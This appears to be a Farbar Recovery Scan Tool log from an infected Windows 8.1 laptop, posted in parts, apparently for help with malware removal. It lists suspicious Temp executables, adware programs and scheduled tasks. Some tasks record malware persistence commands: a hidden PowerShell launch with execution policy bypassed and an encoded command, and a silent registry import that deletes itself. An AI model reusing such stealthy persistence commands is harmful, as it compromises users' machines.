2016-01-09 16:32 - 2016-01-09 16:32 - 0028160 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe
2016-01-09 16:32 - 2016-01-09 16:32 - 0000187 _____ () C:\Users\owner\AppData\Local\Donelectronics.exe.config
2015-05-13 22:14 - 2015-05-13 22:14 - 0274045 _____ () C:\Users\owner\AppData\Local\dsi1.dat
2015-05-13 22:14 - 2015-05-13 22:14 - 0161916 _____ () C:\Users\owner\AppData\Local\dsi2.dat
2015-09-22 08:49 - 2015-09-22 08:49 - 0000000 _____ () C:\Users\owner\AppData\Local\{F9A1F101-40FE-48E1-BEBF-FD740E21840E}
2012-10-09 14:39 - 2012-10-09 14:39 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Files to move or delete:
====================
C:\Windows\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
C:\Windows\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job


Some files in TEMP:
====================
C:\Users\owner\AppData\Local\Temp\2A80.tmp.exe
C:\Users\owner\AppData\Local\Temp\34EC.tmp.exe
C:\Users\owner\AppData\Local\Temp\3F71.tmp.exe
C:\Users\owner\AppData\Local\Temp\427B.tmp.exe
C:\Users\owner\AppData\Local\Temp\63FD.tmp.exe
C:\Users\owner\AppData\Local\Temp\6A02.tmp.exe
C:\Users\owner\AppData\Local\Temp\8076.tmp.exe
C:\Users\owner\AppData\Local\Temp\amisetup5102__15940.exe
C:\Users\owner\AppData\Local\Temp\amisetup9783__15940.exe
C:\Users\owner\AppData\Local\Temp\amzngtb.exe
C:\Users\owner\AppData\Local\Temp\avg6A34.exe
C:\Users\owner\AppData\Local\Temp\avgE955.exe
C:\Users\owner\AppData\Local\Temp\B213.tmp.exe
C:\Users\owner\AppData\Local\Temp\C512.tmp.exe
C:\Users\owner\AppData\Local\Temp\C546.tmp.exe
C:\Users\owner\AppData\Local\Temp\D8EB.tmp.exe
C:\Users\owner\AppData\Local\Temp\DA3.tmp.exe
C:\Users\owner\AppData\Local\Temp\DFF8.tmp.exe
C:\Users\owner\AppData\Local\Temp\EB6C.tmp.exe
C:\Users\owner\AppData\Local\Temp\FD40.tmp.exe
C:\Users\owner\AppData\Local\Temp\Flashbeat_Setup.exe
C:\Users\owner\AppData\Local\Temp\Looksafe_Setup.exe
C:\Users\owner\AppData\Local\Temp\nsz1850.exe
C:\Users\owner\AppData\Local\Temp\Opera_NI_stable.exe
C:\Users\owner\AppData\Local\Temp\setup_766.exe
C:\Users\owner\AppData\Local\Temp\SpOrder.dll
C:\Users\owner\AppData\Local\Temp\TranDex.exe
C:\Users\owner\AppData\Local\Temp\Uninstall.exe
C:\Users\owner\AppData\Local\Temp\UninstallModule.exe
C:\Users\owner\AppData\Local\Temp\Vivafind.exe
C:\Users\owner\AppData\Local\Temp\Voldom.exe
C:\Users\owner\AppData\Local\Temp\widgett.exe


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll
[2015-01-23 12:05] - [2015-01-23 12:05] - 0657920 ____A (Microsoft Corporation) 261452CF5C52EB6514A005FDCC7EDA12

C:\WINDOWS\SysWOW64\dnsapi.dll
[2015-01-23 12:05] - [2015-01-23 12:05] - 0498688 ____A (Microsoft Corporation) 27EE78502A66B4B9E4BD66C5FD081B59

C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
Apparently there's more:

Additional scan result of Farbar Recovery Scan Tool (x64) Version:10-01-2015 01
Ran by owner (2016-01-10 18:14:36)
Running from E:\
Windows 8.1 (X64) (2015-01-23 06:44:37)
Boot Mode: Safe Mode (minimal)
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3773202632-424774445-890114178-500 - Administrator - Disabled)
Guest (S-1-5-21-3773202632-424774445-890114178-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3773202632-424774445-890114178-1005 - Limited - Enabled)
owner (S-1-5-21-3773202632-424774445-890114178-1001 - Administrator - Enabled) => C:\Users\owner

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
Acer Backup Manager (HKLM-x32\...\InstallShield_{9DDDF20E-9FD1-4434-A43E-E7889DBC9420}) (Version: 4.0.0.0071 - NTI Corporation)
Acer Device Fast-lane (HKLM\...\{3F62D2FD-13C1-49A2-8B5D-47623D9460D7}) (Version: 1.00.3007 - Acer Incorporated)
Acer Instant Update Service (HKLM\...\{8215A318-CC27-435E-B3EA-2E3443C8998C}) (Version: 1.00.3013 - Acer Incorporated)
Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3006 - Acer Incorporated)
Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3011 - Acer Incorporated)
AcerCloud (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.01.3115 - Acer Incorporated)
AcerCloud Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.00.3201 - Acer Incorporated)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.009.20079 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.267 - Adobe Systems Incorporated)
Agatha Christie - Death on the Nile (x32 Version: 2.2.0.98 - WildTangent) Hidden
Aloha TriPeaks (x32 Version: 2.2.0.98 - WildTangent) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{649A1FD9-5892-46AD-8DF0-C4A43FF61CB7}) (Version: 4.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{0DE0A178-AC7B-4650-806C-CF226DE03766}) (Version: 4.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{3540181E-340A-4E7A-B409-31663472B2F7}) (Version: 9.1.0.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
Backup Manager v4 (x32 Version: 4.0.0.0071 - NTI Corporation) Hidden
BattleBlock Theater (HKLM-x32\...\Steam App 238460) (Version: - The Behemoth)
Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version: - Irrational Games)
Bloody Trapland (HKLM-x32\...\Steam App 257750) (Version: - 2Play)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version: - Gearbox Software)
Broadcom Card Reader Driver Installer (HKLM\...\{F0A7DF2F-0BE0-470F-B137-D7A19F977189}) (Version: 15.4.7.1 - Broadcom Corporation)
Broforce (HKLM-x32\...\Steam App 274190) (Version: - Free Lives)
CCleaner (HKLM\...\CCleaner) (Version: 5.13 - Piriform)
Cisco AnyConnect Secure Mobility Client (HKLM-x32\...\Cisco AnyConnect Secure Mobility Client) (Version: 3.1.10010 - Cisco Systems, Inc.)
Cisco AnyConnect Secure Mobility Client (x32 Version: 3.1.10010 - Cisco Systems, Inc.) Hidden
clear.fi Media (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.01.3108 - Acer Incorporated)
clear.fi Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.01.3108 - Acer Incorporated)
clear.fi SDK - Video 2 (x32 Version: 2.1.1925 - CyberLink Corp.) Hidden
clear.fi SDK- Movie 2 (x32 Version: 2.1.2008 - CyberLink Corp.) Hidden
Cradle Of Egypt Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
CyberLink MediaEspresso 6.5 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.3103_44819 - CyberLink Corp.)
Delicious: Emily's True Love Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.13 - Dolby Laboratories Inc)
Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
eBay Worldwide (HKLM-x32\...\{A694AF57-9891-4D62-824C-7E55A1361A14}) (Version: 2.3.0630 - OEM)
ETDWare PS/2-X64 11.6.8.001_WHQL (HKLM\...\Elantech) (Version: 11.6.8.001 - ELAN Microelectronic Corp.)
Express Zip File Compression (HKLM-x32\...\ExpressZip) (Version: 2.40 - NCH Software)
Fallout 3 - The Garden of Eden Creation Kit (HKLM-x32\...\{B343B0E3-212A-40B9-8207-1BD299228F5D}) (Version: 1.00.0000 - Bethesda Softworks)
Fallout 3 (HKLM-x32\...\Steam App 22300) (Version: - Bethesda Game Studios)
Fallout: New Vegas (HKLM-x32\...\Steam App 22380) (Version: - Obsidian Entertainment)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Gun Monkeys (HKLM-x32\...\Steam App 239450) (Version: - Size Five Games)
Gyazo 3.1.6 (HKLM-x32\...\{6DB8C365-E719-4BA5-9594-10DFC244D3FD}_is1) (Version: - Nota Inc.)
HP Support Assistant (HKLM-x32\...\{79C54A05-F146-4EA0-8A70-D4EFE6181E52}) (Version: 8.1.40.3 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.0.30.219 - Hewlett-Packard Company)
iCloud (HKLM\...\{B33C558F-772F-4308-A059-390FBF9BAAAE}) (Version: 5.0.2.61 - Apple Inc.)
Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3004 - Acer Incorporated)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.0.1207 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
iTunes (HKLM\...\{E690A491-702F-4DEC-9977-C015D1DBB57C}) (Version: 12.3.1.23 - Apple Inc.)
Java 8 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218065F0}) (Version: 8.0.650.17 - Oracle Corporation)
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Launch Manager (HKLM-x32\...\LManager) (Version: 7.0.5 - Acer Inc.)
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
League of Legends (x32 Version: 3.0.1 - Riot Games) Hidden
Life Is Strange™ (HKLM-x32\...\Steam App 319630) (Version: - DONTNOD Entertainment)
Live Updater (HKLM-x32\...\{EE26E302-876A-48D9-9058-3129E5B99999}) (Version: 2.00.3004 - Acer Incorporated)
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.207 - McAfee, Inc.)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{59E4543A-D49D-4489-B445-473D763C79AF}) (Version: 2.0.672.0 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version: - Microsoft)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 37.0.1 - Mozilla)
Mystery P.I. - Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden
MyWinLocker (Version: 4.0.14.35 - Egis Technology Inc.) Hidden
MyWinLocker 4 (x32 Version: 4.0.14.35 - Egis Technology Inc.) Hidden
MyWinLocker Suite (HKLM-x32\...\InstallShield_{17DF9714-60C9-43C9-A9C2-32BCAED44CBE}) (Version: 4.0.14.24 - Egis Technology Inc.)
MyWinLocker Suite (x32 Version: 4.0.14.24 - Egis Technology Inc.) Hidden
Network Secured DNS (HKLM-x32\...\Dnsio) (Version: 1.52.0.0 - Network Secured DNS)
Nexon Launcher (HKLM-x32\...\Nexon Nexon Launcher) (Version: 1.1.1 - Nexon)
NTI Media Maker 9 (HKLM-x32\...\InstallShield_{D3D5C4E8-040F-4C6F-8105-41D43CF94F44}) (Version: 9.0.2.9008 - NTI Corporation)
NTI Media Maker 9 (x32 Version: 9.0.2.9008 - NTI Corporation) Hidden
NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
Office Addin (HKLM-x32\...\{6D2BBE1D-E600-4695-BA37-0B0E605542CC}) (Version: 2.01.3200 - Acer)
Office Addin 2003 (HKLM-x32\...\{1FCC073B-CC01-4443-AD20-E559F66E6E83}) (Version: 2.01.3200 - Acer)
One Finger Death Punch (HKLM-x32\...\Steam App 264200) (Version: - Silver Dollar Games)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - )
OpenOffice 4.1.2 (HKLM-x32\...\{E6AD67BB-1C33-4AB3-A387-E0D48137AB70}) (Version: 4.12.9782 - Apache Software Foundation)
osu! (HKLM-x32\...\{12d09afc-32f6-4832-997f-7eb4503e4cdc}) (Version: latest - ppy Pty Ltd)
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version: - OVERKILL - a Starbreeze Studio.)
Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.206 - Qualcomm Atheros Communications)
Qualcomm Atheros WiFi Driver Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 11.05 - Qualcomm Atheros)
QuickTime 7 (HKLM-x32\...\{80CEEB1E-0A6C-45B9-A312-37A1D25FDEBC}) (Version: 7.78.80.95 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6657 - Realtek Semiconductor Corp.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Shredder (Version: 2.0.8.9 - Egis Technology Inc.) Hidden
Shredder (x32 Version: 2.0.8.9 - Egis Technology Inc.) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.)
Spelunky (HKLM-x32\...\Steam App 239350) (Version: - )
Spotify (HKLM-x32\...\Spotify) (Version: 0.8.4.99.ga249b5f1 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden
TeamSpeak 3 Client (HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
Terraria (HKLM-x32\...\Steam App 105600) (Version: - Re-Logic)
The Binding of Isaac: Rebirth (HKLM-x32\...\Steam App 250900) (Version: - Nicalis, Inc.)
The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version: - Bethesda Game Studios)
To the Moon (HKLM-x32\...\Steam App 206440) (Version: - Freebird Games)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)
Voxal Voice Changer (HKLM-x32\...\Voxal) (Version: 1.25 - NCH Software)
Warframe (HKLM-x32\...\Steam App 230410) (Version: - Digital Extremes)
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)
WildTangent Games App (x32 Version: 4.0.9.3 - WildTangent) Hidden
Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3773202632-424774445-890114178-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
 
Last one :)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {08E144DB-88C1-4779-A060-554E4829D9D2} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main => C:\Users\owner\AppData\Local\Temp\is-FBE0G.tmp\ScreenCapture_Win8.exe [2016-01-09] (gltstech.net) <==== ATTENTION
Task: {11BD7304-492C-4439-9D34-A81068D0C392} - System32\Tasks\RSPro => C:\Users\owner\AppData\Local\SearchModule\dblaunch.exe
Task: {16528CA3-F849-4C28-B9DC-48BEBB959C9B} - \IBUpd -> No File <==== ATTENTION
Task: {1A212BEF-CCD3-4085-BB8E-7E2016157EFB} - System32\Tasks\GyazoUpdateTaskMachine => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
Task: {1A546FC0-FA8F-4CED-A832-6AFCE1A6B2DC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {1C4B8754-4CCC-4813-BCFA-E1BACF2369AC} - System32\Tasks\GoogleUpdateTaskAdminS-1-5-21-4287834998-254447837-4126873412-1010 => C:\Program Files\Svc Host\svchost.exe [2016-01-09] (Microsoft)
Task: {22B26FFA-C210-45FC-B7B2-6F1BE8C209B0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-07] (Google Inc.)
Task: {23794007-224A-4E7F-9BBD-DF81D69DA5C6} - \Wse_taplika -> No File <==== ATTENTION
Task: {252A8F75-9B4E-46BC-9DE4-07746515D1B0} - System32\Tasks\GTNU_635879831232953538 => Chrome.exe hxxp://www.5web.co/wapi/tudp.php?fp=3D01-4207-D424-6ED1-6316-4FCF-39D7-0D43&cc=CA
Task: {285ED968-B027-4E84-89B2-FCAE719FC597} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2012-07-04] (CyberLink)
Task: {2973220D-0686-4846-8402-1B6902AB5EE0} - \One System Care Monitor -> No File <==== ATTENTION
Task: {2D2677DF-ECED-40D3-9494-DEEFF6DFCBA8} - System32\Tasks\DfGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837 => 50000
Task: {2EE58792-0DF1-43F3-8876-01F8D027EEC0} - System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Pending Update => C:\Program Files (x86)\SwiftSearch_1.10.0.25\Update\SwiftSearchAutoUpdateClient.exe <==== ATTENTION
Task: {32179E0D-7013-4B23-A43B-8382F890FECB} - System32\Tasks\ALU => C:\Program Files (x86)\Acer\Live Updater\updater.exe [2012-08-29] ()
Task: {3334EB49-C86F-45BD-8145-728921B1AE75} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-26] (Apple Inc.)
Task: {3AF24C5B-AA9E-400C-9823-0632119078A6} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: {3AFE7DCE-A37F-406C-8FF9-4C2024106030} - System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Core => C:\Program Files (x86)\SwiftSearch_1.10.0.25\Update\SwiftSearchAutoUpdateClient.exe <==== ATTENTION
Task: {43344108-F38A-47C2-8354-25FF3F9A5E00} - System32\Tasks\IBUpd2 => C:\Users\owner\AppData\Local\BrowserAir\47.0.0.3\updater.exe
Task: {4483CAD1-273A-460E-BCD1-7528ABC6361C} - System32\Tasks\System Healer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE
Task: {49E18F13-C232-46E5-B2B9-CB9A6B05EDAF} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
Task: {4B4EA442-4CBE-431C-A8F1-9A6A94D2A2C3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4287834998-254447837-4126873412-1000Main => 50000,1
Task: {4D7C72BC-0587-426B-A153-339DDDE59812} - System32\Tasks\AdGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010D => C:\Program Files\Explore\iexloprer.exe [2016-01-09] (Microsoft)
Task: {52059878-BC54-47DF-9E6E-CBA49724460E} - System32\Tasks\iuBrowserIEAgent => C:\Program Files\Acer\Acer Instant Service\InstantUpdate\iuBrowserIEAgent.exe [2012-08-22] ()
Task: {568AAEFF-F3D4-49CE-93DF-AFFCF6ADABF0} - System32\Tasks\Foebyyc => C:\PROGRA~1\GROOVE~1\Sovri.bat
Task: {5D102AA7-504E-4431-A61D-C495A561C3E3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {67153154-EDE8-41E9-947F-1251F35B6C8D} - System32\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand
Task: {680E9242-EA06-4B9A-AD7F-3CB4585120DE} - System32\Tasks\psv_Temptough => /c regedit.exe /s "C:\ProgramData\Medlight\Physronwarm.reg" & del "C:\ProgramData\Medlight\Physronwarm.reg" & SCHTASKS /Delete /TN "psv_Temptough" /F <==== ATTENTION
Task: {6A06F2E2-A9E3-4D48-8BA2-0A8D99B9B386} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
Task: {7213CECA-856F-49B0-9BE8-1A0D716FF580} - System32\Tasks\GNU_635879831225933307 => C:\Users\owner\AppData\Roaming\SafeWeb\gsw.exe
Task: {775F46EB-0A69-4534-BCF9-78E95CFD1A8E} - System32\Tasks\Easy Driver Pro Schedule => C:\Program Files (x86)\Probit Software\Easy Driver Pro\EDPTray.exe
Task: {850B6F24-BFEA-4BDC-BB72-E7C8F2C5D23E} - System32\Tasks\Opera scheduled Autoupdate 1452386042 => C:\Program Files (x86)\Opera\launcher.exe
Task: {86C4588C-6DEB-4673-A725-802728388B8C} - System32\Tasks\WebDnsio2-daily => C:\Program Files (x86)\WebDnsio\WebDnsio.exe [2015-11-16] ()
Task: {889A02E4-9406-4332-950C-98E052F215FD} - System32\Tasks\PMMUpdate => C:\Program Files\EgisTec IPS\PMMUpdate.exe [2012-07-11] (Egis Technology Inc.)
Task: {8941FF4A-455A-4F4B-9F2E-1DCD660A1FDE} - System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010 => C:\Program Files\Task Host\taskhost.exe [2016-01-09] (Microsoft)
Task: {92D813B2-AA5B-4A97-93B5-19CC0A69B867} - \One System Care Task -> No File <==== ATTENTION
Task: {9DDA3311-9424-4D32-902F-22A85EE0905D} - System32\Tasks\LSNHDG1 => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION
Task: {A23E1D8E-B2C8-4179-8E36-5F1D94FEB50A} - System32\Tasks\GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-3773202632-424774445-890114178-1001
